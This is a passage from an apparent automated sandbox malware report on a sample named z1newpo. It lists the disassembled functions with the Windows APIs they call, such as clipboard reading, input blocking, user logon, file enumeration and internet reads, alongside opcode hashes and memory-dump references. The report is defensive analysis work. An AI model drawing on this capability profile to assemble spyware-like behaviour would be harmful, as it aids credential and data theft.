                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                    • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                    • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                    • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                    Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                    • CoInitialize.OLE32(00000000), ref: 00478442
                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                    • CoUninitialize.OLE32 ref: 0047863C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 886957087-24824748
                                                    • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                    • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                    • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                    • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                    Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                    • String ID:
                                                    • API String ID: 15083398-0
                                                    • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                    • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                    • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                    • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                    Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: U$\
                                                    • API String ID: 4104443479-100911408
                                                    • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                    • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                    • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                    • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                    Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                    • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                    • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                    • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                    Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                    • FindClose.KERNEL32(00000000), ref: 004339EB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                    • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                    • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                    • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                    Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                    • String ID:
                                                    • API String ID: 901099227-0
                                                    • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                    • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                    • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                    • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                    Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Proc
                                                    • String ID:
                                                    • API String ID: 2346855178-0
                                                    • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                    • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                    • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                    • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                    Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 0045A38B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                    • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                    • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                    • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                    Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                    • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                    • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                    • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                    Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                    • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                    • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                    • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                    Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                    • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                    • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                    • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                    Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N@
                                                    • API String ID: 0-1509896676
                                                    • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                    • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                    • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                    • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                    Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                    • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                    • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                    • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                    Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                    • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                    • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                    • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                    Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                    • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                    • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                    • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                    Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
